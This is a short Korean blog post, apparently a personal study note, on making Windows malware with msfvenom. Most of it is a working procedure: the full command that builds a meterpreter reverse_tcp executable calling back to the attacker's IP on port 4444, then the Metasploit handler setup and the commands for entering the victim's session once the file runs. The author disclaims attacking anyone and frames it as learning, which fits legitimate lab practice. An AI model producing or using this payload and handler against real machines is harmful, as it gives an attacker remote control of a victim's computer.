MSFvenom 을 이용한 악성코드 제작

메타스플로잇을 공부하면서 이것저것 해보는데 정리할 겸 글을 쓰면서 할게요.

해당 글을 보시고 제작하여 공격하시면 안됩니다.

공격해서 은팔찌 차면... 

어디까지나 공부 목적으로 하세요.

타겟은 window 7 x64 입니다

먼저 자신의 내부 IP 주소를 확인 합니다.

그래야 제것과 타겟을 연결하겠죠??

msfvenom을 사용해서 제작할거라 먼저 목록을 봅니다. 

타겟은 windows 이기 때문에 다른 것을 안보려고 grep으로 windows 만 잡았습니다.

msfvenom -l

드디어 msfvenom을 이용해서 제작을 합니다.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.182.138 lport=4444 -f exe > /root/Desktop/windows.exe

lhost 는 공격자 ip

lport 는 포트 번호

-f 는 파일 형식 윈도우이기 때문에 exe!!

> 는 제작할 위치를 해주기 위해서...

완전 기본적인 설정...

msfconsole 을 켜주신 뒤 원격 연결을 준비합니다.

use exploit/multi/handler  핸들러를 이용해서 연결하기 위해서 사용합니다.

set payload windows/x64/meterpreter/reverse_tcp msfvenom 에서 사용한 페이로드를 그대로 사용해주세요!

set lhost 192.168.182.138

set lport 4444

set exitonsession false // 백그라운드로 세션을 하기 위해서 사용합니다.

exploit -j 연결되기 기달리자!

이제 타겟이 파일을 실행해주면 제가 원격으로 붙을 수 있게 됩니다.

sessions // 어떤 세션이 있는지 확인

sessions -i @ // 몇 번 세션이 있는지 확인하고 해당 번호로 들어가시면 됩니다. @는 번호!

아래는 시연 영상입니다.